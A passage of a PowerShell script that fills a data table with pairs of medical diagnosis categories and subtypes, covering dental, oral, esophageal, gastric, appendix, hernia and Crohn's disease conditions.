unspecified") + $null = $DiagnosisList.Rows.Add("Gingival recession, localized","Localized gingival recession, minimal") + $null = $DiagnosisList.Rows.Add("Gingival recession, localized","Localized gingival recession, moderate") + $null = $DiagnosisList.Rows.Add("Gingival recession, localized","Localized gingival recession, severe") + $null = $DiagnosisList.Rows.Add("Gingival recession, generalized","Generalized gingival recession, unspecified") + $null = $DiagnosisList.Rows.Add("Gingival recession, generalized","Generalized gingival recession, minimal") + $null = $DiagnosisList.Rows.Add("Gingival recession, generalized","Generalized gingival recession, moderate") + $null = $DiagnosisList.Rows.Add("Gingival recession, generalized","Generalized gingival recession, severe") + $null = $DiagnosisList.Rows.Add("Gingival enlargement","Gingival enlargement") + $null = $DiagnosisList.Rows.Add("Gingival and edentulous alveolar ridge lesions associated with trauma","Gingival and edentulous alveolar ridge lesions associated with trauma") + $null = $DiagnosisList.Rows.Add("Horizontal alveolar bone loss","Horizontal alveolar bone loss") + $null = $DiagnosisList.Rows.Add("Other specified disorders of gingiva and edentulous alveolar ridge","Other specified disorders of gingiva and edentulous alveolar ridge") + $null = $DiagnosisList.Rows.Add("Disorder of gingiva and edentulous alveolar ridge, unspecified","Disorder of gingiva and edentulous alveolar ridge, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of teeth and supporting structures","Exfoliation of teeth due to systemic causes") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth, unspecified cause","Complete loss of teeth, unspecified cause, class I") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth, unspecified cause","Complete loss of teeth, unspecified cause, class II") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth, unspecified cause","Complete loss of teeth, unspecified cause, class III") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth, unspecified cause","Complete loss of teeth, unspecified cause, class IV") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth, unspecified cause","Complete loss of teeth, unspecified cause, unspecified class") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to trauma","Complete loss of teeth due to trauma, class I") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to trauma","Complete loss of teeth due to trauma, class II") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to trauma","Complete loss of teeth due to trauma, class III") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to trauma","Complete loss of teeth due to trauma, class IV") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to trauma","Complete loss of teeth due to trauma, unspecified class") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to periodontal diseases","Complete loss of teeth due to periodontal diseases, class I") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to periodontal diseases","Complete loss of teeth due to periodontal diseases, class II") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to periodontal diseases","Complete loss of teeth due to periodontal diseases, class III") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to periodontal diseases","Complete loss of teeth due to periodontal diseases, class IV") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to periodontal diseases","Complete loss of teeth due to periodontal diseases, unspecified class") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to caries","Complete loss of teeth due to caries, class I") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to caries","Complete loss of teeth due to caries, class II") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to caries","Complete loss of teeth due to caries, class III") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to caries","Complete loss of teeth due to caries, class IV") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to caries","Complete loss of teeth due to caries, unspecified class") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to other specified cause","Complete loss of teeth due to other specified cause, class I") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to other specified cause","Complete loss of teeth due to other specified cause, class II") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to other specified cause","Complete loss of teeth due to other specified cause, class III") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to other specified cause","Complete loss of teeth due to other specified cause, class IV") + $null = $DiagnosisList.Rows.Add("Complete loss of teeth due to other specified cause","Complete loss of teeth due to other specified cause, unspecified class") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Unspecified atrophy of edentulous alveolar ridge") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Minimal atrophy of the mandible") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Moderate atrophy of the mandible") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Severe atrophy of the mandible") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Minimal atrophy of maxilla") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Moderate atrophy of the maxilla") + $null = $DiagnosisList.Rows.Add("Atrophy of edentulous alveolar ridge","Severe atrophy of the maxilla") + $null = $DiagnosisList.Rows.Add("Retained dental root","Retained dental root") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth, unspecified cause","Partial loss of teeth, unspecified cause, class I") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth, unspecified cause","Partial loss of teeth, unspecified cause, class II") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth, unspecified cause","Partial loss of teeth, unspecified cause, class III") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth, unspecified cause","Partial loss of teeth, unspecified cause, class IV") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth, unspecified cause","Partial loss of teeth, unspecified cause, unspecified class") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to trauma","Partial loss of teeth due to trauma, class I") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to trauma","Partial loss of teeth due to trauma, class II") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to trauma","Partial loss of teeth due to trauma, class III") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to trauma","Partial loss of teeth due to trauma, class IV") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to trauma","Partial loss of teeth due to trauma, unspecified class") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to periodontal diseases","Partial loss of teeth due to periodontal diseases, class I") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to periodontal diseases","Partial loss of teeth due to periodontal diseases, class II") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to periodontal diseases","Partial loss of teeth due to periodontal diseases, class III") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to periodontal diseases","Partial loss of teeth due to periodontal diseases, class IV") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to periodontal diseases","Partial loss of teeth due to periodontal diseases, unspecified class") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to caries","Partial loss of teeth due to caries, class I") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to caries","Partial loss of teeth due to caries, class II") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to caries","Partial loss of teeth due to caries, class III") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to caries","Partial loss of teeth due to caries, class IV") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to caries","Partial loss of teeth due to caries, unspecified class") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to other specified cause","Partial loss of teeth due to other specified cause, class I") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to other specified cause","Partial loss of teeth due to other specified cause, class II") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to other specified cause","Partial loss of teeth due to other specified cause, class III") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to other specified cause","Partial loss of teeth due to other specified cause, class IV") + $null = $DiagnosisList.Rows.Add("Partial loss of teeth due to other specified cause","Partial loss of teeth due to other specified cause, unspecified class") + $null = $DiagnosisList.Rows.Add("Unsatisfactory restoration of tooth","Unsatisfactory restoration of tooth, unspecified") + $null = $DiagnosisList.Rows.Add("Unsatisfactory restoration of tooth","Open restoration margins of tooth") + $null = $DiagnosisList.Rows.Add("Unsatisfactory restoration of tooth","Unrepairable overhanging of dental restorative materials") + $null = $DiagnosisList.Rows.Add("Fractured dental restorative material","Fractured dental restorative material without loss of material") + $null = $DiagnosisList.Rows.Add("Fractured dental restorative material","Fractured dental restorative material with loss of material") + $null = $DiagnosisList.Rows.Add("Fractured dental restorative material","Fractured dental restorative material, unspecified") + $null = $DiagnosisList.Rows.Add("Contour of existing restoration of tooth biologically incompatible with oral health","Contour of existing restoration of tooth biologically incompatible with oral health") + $null = $DiagnosisList.Rows.Add("Allergy to existing dental restorative material","Allergy to existing dental restorative material") + $null = $DiagnosisList.Rows.Add("Poor aesthetic of existing restoration of tooth","Poor aesthetic of existing restoration of tooth") + $null = $DiagnosisList.Rows.Add("Other unsatisfactory restoration of tooth","Other unsatisfactory restoration of tooth") + $null = $DiagnosisList.Rows.Add("Other specified disorders of teeth and supporting structures","Primary occlusal trauma") + $null = $DiagnosisList.Rows.Add("Other specified disorders of teeth and supporting structures","Secondary occlusal trauma") + $null = $DiagnosisList.Rows.Add("Other specified disorders of teeth and supporting structures","Other specified disorders of teeth and supporting structures") + $null = $DiagnosisList.Rows.Add("Disorder of teeth and supporting structures, unspecified","Disorder of teeth and supporting structures, unspecified") + $null = $DiagnosisList.Rows.Add("Cysts of oral region, not elsewhere classified","Developmental odontogenic cysts") + $null = $DiagnosisList.Rows.Add("Cysts of oral region, not elsewhere classified","Developmental (nonodontogenic) cysts of oral region") + $null = $DiagnosisList.Rows.Add("Cysts of oral region, not elsewhere classified","Other cysts of oral region, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Cysts of oral region, not elsewhere classified","Cyst of oral region, unspecified") + $null = $DiagnosisList.Rows.Add("Diseases of salivary glands","Atrophy of salivary gland") + $null = $DiagnosisList.Rows.Add("Diseases of salivary glands","Hypertrophy of salivary gland") + $null = $DiagnosisList.Rows.Add("Sialoadenitis","Sialoadenitis, unspecified") + $null = $DiagnosisList.Rows.Add("Sialoadenitis","Acute sialoadenitis") + $null = $DiagnosisList.Rows.Add("Sialoadenitis","Acute recurrent sialoadenitis") + $null = $DiagnosisList.Rows.Add("Sialoadenitis","Chronic sialoadenitis") + $null = $DiagnosisList.Rows.Add("Abscess of salivary gland","Abscess of salivary gland") + $null = $DiagnosisList.Rows.Add("Fistula of salivary gland","Fistula of salivary gland") + $null = $DiagnosisList.Rows.Add("Sialolithiasis","Sialolithiasis") + $null = $DiagnosisList.Rows.Add("Mucocele of salivary gland","Mucocele of salivary gland") + $null = $DiagnosisList.Rows.Add("Disturbances of salivary secretion","Disturbances of salivary secretion") + $null = $DiagnosisList.Rows.Add("Other diseases of salivary glands","Other diseases of salivary glands") + $null = $DiagnosisList.Rows.Add("Disease of salivary gland, unspecified","Disease of salivary gland, unspecified") + $null = $DiagnosisList.Rows.Add("Stomatitis and related lesions","Recurrent oral aphthae") + $null = $DiagnosisList.Rows.Add("Stomatitis and related lesions","Other forms of stomatitis") + $null = $DiagnosisList.Rows.Add("Stomatitis and related lesions","Cellulitis and abscess of mouth") + $null = $DiagnosisList.Rows.Add("Oral mucositis (ulcerative)","Oral mucositis (ulcerative), unspecified") + $null = $DiagnosisList.Rows.Add("Oral mucositis (ulcerative)","Oral mucositis (ulcerative) due to antineoplastic therapy") + $null = $DiagnosisList.Rows.Add("Oral mucositis (ulcerative)","Oral mucositis (ulcerative) due to other drugs") + $null = $DiagnosisList.Rows.Add("Oral mucositis (ulcerative)","Oral mucositis (ulcerative) due to radiation") + $null = $DiagnosisList.Rows.Add("Oral mucositis (ulcerative)","Other oral mucositis (ulcerative)") + $null = $DiagnosisList.Rows.Add("Other diseases of lip and oral mucosa","Diseases of lips") + $null = $DiagnosisList.Rows.Add("Other diseases of lip and oral mucosa","Cheek and lip biting") + $null = $DiagnosisList.Rows.Add("Leukoplakia and other disturbances of oral epithelium, including tongue","Leukoplakia of oral mucosa, including tongue") + $null = $DiagnosisList.Rows.Add("Leukoplakia and other disturbances of oral epithelium, including tongue","Minimal keratinized residual ridge mucosa") + $null = $DiagnosisList.Rows.Add("Leukoplakia and other disturbances of oral epithelium, including tongue","Excessive keratinized residual ridge mucosa") + $null = $DiagnosisList.Rows.Add("Leukoplakia and other disturbances of oral epithelium, including tongue","Leukokeratosis nicotina palati") + $null = $DiagnosisList.Rows.Add("Leukoplakia and other disturbances of oral epithelium, including tongue","Other disturbances of oral epithelium, including tongue") + $null = $DiagnosisList.Rows.Add("Hairy leukoplakia","Hairy leukoplakia") + $null = $DiagnosisList.Rows.Add("Granuloma and granuloma-like lesions of oral mucosa","Granuloma and granuloma-like lesions of oral mucosa") + $null = $DiagnosisList.Rows.Add("Oral submucous fibrosis","Oral submucous fibrosis") + $null = $DiagnosisList.Rows.Add("Irritative hyperplasia of oral mucosa","Irritative hyperplasia of oral mucosa") + $null = $DiagnosisList.Rows.Add("Other and unspecified lesions of oral mucosa","Unspecified lesions of oral mucosa") + $null = $DiagnosisList.Rows.Add("Other and unspecified lesions of oral mucosa","Other lesions of oral mucosa") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Glossitis") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Geographic tongue") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Median rhomboid glossitis") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Hypertrophy of tongue papillae") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Atrophy of tongue papillae") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Plicated tongue") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Glossodynia") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Other diseases of tongue") + $null = $DiagnosisList.Rows.Add("Diseases of tongue","Disease of tongue, unspecified") + $null = $DiagnosisList.Rows.Add("Esophagitis","Eosinophilic esophagitis") + $null = $DiagnosisList.Rows.Add("Esophagitis","Other esophagitis") + $null = $DiagnosisList.Rows.Add("Esophagitis","Esophagitis, unspecified") + $null = $DiagnosisList.Rows.Add("Gastro-esophageal reflux disease","Gastro-esophageal reflux disease with esophagitis") + $null = $DiagnosisList.Rows.Add("Gastro-esophageal reflux disease","Gastro-esophageal reflux disease without esophagitis") + $null = $DiagnosisList.Rows.Add("Other diseases of esophagus","Achalasia of cardia") + $null = $DiagnosisList.Rows.Add("Ulcer of esophagus","Ulcer of esophagus without bleeding") + $null = $DiagnosisList.Rows.Add("Ulcer of esophagus","Ulcer of esophagus with bleeding") + $null = $DiagnosisList.Rows.Add("Esophageal obstruction","Esophageal obstruction") + $null = $DiagnosisList.Rows.Add("Perforation of esophagus","Perforation of esophagus") + $null = $DiagnosisList.Rows.Add("Dyskinesia of esophagus","Dyskinesia of esophagus") + $null = $DiagnosisList.Rows.Add("Diverticulum of esophagus, acquired","Diverticulum of esophagus, acquired") + $null = $DiagnosisList.Rows.Add("Gastro-esophageal laceration-hemorrhage syndrome","Gastro-esophageal laceration-hemorrhage syndrome") + $null = $DiagnosisList.Rows.Add("Barrett's esophagus","Barrett's esophagus without dysplasia") + $null = $DiagnosisList.Rows.Add("Barrett's esophagus with dysplasia","Barrett's esophagus with low grade dysplasia") + $null = $DiagnosisList.Rows.Add("Barrett's esophagus with dysplasia","Barrett's esophagus with high grade dysplasia") + $null = $DiagnosisList.Rows.Add("Barrett's esophagus with dysplasia","Barrett's esophagus with dysplasia, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified diseases of esophagus","Other specified diseases of esophagus") + $null = $DiagnosisList.Rows.Add("Disease of esophagus, unspecified","Disease of esophagus, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of esophagus in diseases classified elsewhere","Disorders of esophagus in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Acute gastric ulcer with hemorrhage") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Acute gastric ulcer with perforation") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Acute gastric ulcer with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Acute gastric ulcer without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Chronic or unspecified gastric ulcer with hemorrhage") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Chronic or unspecified gastric ulcer with perforation") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Chronic or unspecified gastric ulcer with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Chronic gastric ulcer without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Gastric ulcer","Gastric ulcer, unspecified as acute or chronic, without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Acute duodenal ulcer with hemorrhage") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Acute duodenal ulcer with perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Acute duodenal ulcer with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Acute duodenal ulcer without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Chronic or unspecified duodenal ulcer with hemorrhage") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Chronic or unspecified duodenal ulcer with perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Chronic or unspecified duodenal ulcer with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Chronic duodenal ulcer without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Duodenal ulcer","Duodenal ulcer, unspecified as acute or chronic, without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Acute peptic ulcer, site unspecified, with hemorrhage") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Acute peptic ulcer, site unspecified, with perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Acute peptic ulcer, site unspecified, with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Acute peptic ulcer, site unspecified, without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Chronic or unspecified peptic ulcer, site unspecified, with hemorrhage") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Chronic or unspecified peptic ulcer, site unspecified, with perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Chronic or unspecified peptic ulcer, site unspecified, with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Chronic peptic ulcer, site unspecified, without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Peptic ulcer, site unspecified","Peptic ulcer, site unspecified, unspecified as acute or chronic, without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Acute gastrojejunal ulcer with hemorrhage") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Acute gastrojejunal ulcer with perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Acute gastrojejunal ulcer with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Acute gastrojejunal ulcer without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Chronic or unspecified gastrojejunal ulcer with hemorrhage") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Chronic or unspecified gastrojejunal ulcer with perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Chronic or unspecified gastrojejunal ulcer with both hemorrhage and perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Chronic gastrojejunal ulcer without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Gastrojejunal ulcer","Gastrojejunal ulcer, unspecified as acute or chronic, without hemorrhage or perforation") + $null = $DiagnosisList.Rows.Add("Acute gastritis","Acute gastritis without bleeding") + $null = $DiagnosisList.Rows.Add("Acute gastritis","Acute gastritis with bleeding") + $null = $DiagnosisList.Rows.Add("Alcoholic gastritis","Alcoholic gastritis without bleeding") + $null = $DiagnosisList.Rows.Add("Alcoholic gastritis","Alcoholic gastritis with bleeding") + $null = $DiagnosisList.Rows.Add("Chronic superficial gastritis","Chronic superficial gastritis without bleeding") + $null = $DiagnosisList.Rows.Add("Chronic superficial gastritis","Chronic superficial gastritis with bleeding") + $null = $DiagnosisList.Rows.Add("Chronic atrophic gastritis","Chronic atrophic gastritis without bleeding") + $null = $DiagnosisList.Rows.Add("Chronic atrophic gastritis","Chronic atrophic gastritis with bleeding") + $null = $DiagnosisList.Rows.Add("Unspecified chronic gastritis","Unspecified chronic gastritis without bleeding") + $null = $DiagnosisList.Rows.Add("Unspecified chronic gastritis","Unspecified chronic gastritis with bleeding") + $null = $DiagnosisList.Rows.Add("Other gastritis","Other gastritis without bleeding") + $null = $DiagnosisList.Rows.Add("Other gastritis","Other gastritis with bleeding") + $null = $DiagnosisList.Rows.Add("Gastritis, unspecified","Gastritis, unspecified, without bleeding") + $null = $DiagnosisList.Rows.Add("Gastritis, unspecified","Gastritis, unspecified, with bleeding") + $null = $DiagnosisList.Rows.Add("Duodenitis","Duodenitis without bleeding") + $null = $DiagnosisList.Rows.Add("Duodenitis","Duodenitis with bleeding") + $null = $DiagnosisList.Rows.Add("Gastroduodenitis, unspecified","Gastroduodenitis, unspecified, without bleeding") + $null = $DiagnosisList.Rows.Add("Gastroduodenitis, unspecified","Gastroduodenitis, unspecified, with bleeding") + $null = $DiagnosisList.Rows.Add("Functional dyspepsia","Functional dyspepsia") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Acute dilatation of stomach") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Adult hypertrophic pyloric stenosis") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Hourglass stricture and stenosis of stomach") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Pylorospasm, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Gastric diverticulum") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Obstruction of duodenum") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Fistula of stomach and duodenum") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Polyp of stomach and duodenum") + $null = $DiagnosisList.Rows.Add("Angiodysplasia of stomach and duodenum","Angiodysplasia of stomach and duodenum with bleeding") + $null = $DiagnosisList.Rows.Add("Angiodysplasia of stomach and duodenum","Angiodysplasia of stomach and duodenum without bleeding") + $null = $DiagnosisList.Rows.Add("Dieulafoy lesion (hemorrhagic) of stomach and duodenum","Dieulafoy lesion (hemorrhagic) of stomach and duodenum") + $null = $DiagnosisList.Rows.Add("Achlorhydria","Achlorhydria") + $null = $DiagnosisList.Rows.Add("Gastroparesis","Gastroparesis") + $null = $DiagnosisList.Rows.Add("Other diseases of stomach and duodenum","Other diseases of stomach and duodenum") + $null = $DiagnosisList.Rows.Add("Disease of stomach and duodenum, unspecified","Disease of stomach and duodenum, unspecified") + $null = $DiagnosisList.Rows.Add("Acute appendicitis","Acute appendicitis with generalized peritonitis") + $null = $DiagnosisList.Rows.Add("Acute appendicitis","Acute appendicitis with localized peritonitis") + $null = $DiagnosisList.Rows.Add("Other and unspecified acute appendicitis","Unspecified acute appendicitis") + $null = $DiagnosisList.Rows.Add("Other and unspecified acute appendicitis","Other acute appendicitis") + $null = $DiagnosisList.Rows.Add("Other appendicitis","Other appendicitis") + $null = $DiagnosisList.Rows.Add("Unspecified appendicitis","Unspecified appendicitis") + $null = $DiagnosisList.Rows.Add("Other diseases of appendix","Hyperplasia of appendix") + $null = $DiagnosisList.Rows.Add("Other diseases of appendix","Appendicular concretions") + $null = $DiagnosisList.Rows.Add("Other diseases of appendix","Diverticulum of appendix") + $null = $DiagnosisList.Rows.Add("Other diseases of appendix","Fistula of appendix") + $null = $DiagnosisList.Rows.Add("Other diseases of appendix","Other specified diseases of appendix") + $null = $DiagnosisList.Rows.Add("Other diseases of appendix","Disease of appendix, unspecified") + $null = $DiagnosisList.Rows.Add("Bilateral inguinal hernia, with obstruction, without gangrene","Bilateral inguinal hernia, with obstruction, without gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral inguinal hernia, with obstruction, without gangrene","Bilateral inguinal hernia, with obstruction, without gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral inguinal hernia, with gangrene","Bilateral inguinal hernia, with gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral inguinal hernia, with gangrene","Bilateral inguinal hernia, with gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral inguinal hernia, without obstruction or gangrene","Bilateral inguinal hernia, without obstruction or gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral inguinal hernia, without obstruction or gangrene","Bilateral inguinal hernia, without obstruction or gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral inguinal hernia, with obstruction, without gangrene","Unilateral inguinal hernia, with obstruction, without gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral inguinal hernia, with obstruction, without gangrene","Unilateral inguinal hernia, with obstruction, without gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral inguinal hernia, with gangrene","Unilateral inguinal hernia, with gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral inguinal hernia, with gangrene","Unilateral inguinal hernia, with gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral inguinal hernia, without obstruction or gangrene","Unilateral inguinal hernia, without obstruction or gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral inguinal hernia, without obstruction or gangrene","Unilateral inguinal hernia, without obstruction or gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral femoral hernia, with obstruction, without gangrene","Bilateral femoral hernia, with obstruction, without gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral femoral hernia, with obstruction, without gangrene","Bilateral femoral hernia, with obstruction, without gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral femoral hernia, with gangrene","Bilateral femoral hernia, with gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral femoral hernia, with gangrene","Bilateral femoral hernia, with gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral femoral hernia, without obstruction or gangrene","Bilateral femoral hernia, without obstruction or gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Bilateral femoral hernia, without obstruction or gangrene","Bilateral femoral hernia, without obstruction or gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral femoral hernia, with obstruction, without gangrene","Unilateral femoral hernia, with obstruction, without gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral femoral hernia, with obstruction, without gangrene","Unilateral femoral hernia, with obstruction, without gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral femoral hernia, with gangrene","Unilateral femoral hernia, with gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral femoral hernia, with gangrene","Unilateral femoral hernia, with gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral femoral hernia, without obstruction or gangrene","Unilateral femoral hernia, without obstruction or gangrene, not specified as recurrent") + $null = $DiagnosisList.Rows.Add("Unilateral femoral hernia, without obstruction or gangrene","Unilateral femoral hernia, without obstruction or gangrene, recurrent") + $null = $DiagnosisList.Rows.Add("Umbilical hernia","Umbilical hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Umbilical hernia","Umbilical hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Umbilical hernia","Umbilical hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Incisional hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Incisional hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Incisional hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Parastomal hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Parastomal hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Parastomal hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Other and unspecified ventral hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Other and unspecified ventral hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Ventral hernia","Ventral hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Diaphragmatic hernia","Diaphragmatic hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Diaphragmatic hernia","Diaphragmatic hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Diaphragmatic hernia","Diaphragmatic hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Other abdominal hernia","Other specified abdominal hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Other abdominal hernia","Other specified abdominal hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Other abdominal hernia","Other specified abdominal hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Unspecified abdominal hernia","Unspecified abdominal hernia with obstruction, without gangrene") + $null = $DiagnosisList.Rows.Add("Unspecified abdominal hernia","Unspecified abdominal hernia with gangrene") + $null = $DiagnosisList.Rows.Add("Unspecified abdominal hernia","Unspecified abdominal hernia without obstruction or gangrene") + $null = $DiagnosisList.Rows.Add("Crohn's disease of small intestine","Crohn's disease of small intestine without complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease of small intestine with complications","Crohn's disease of small intestine with rectal bleeding") + $null = 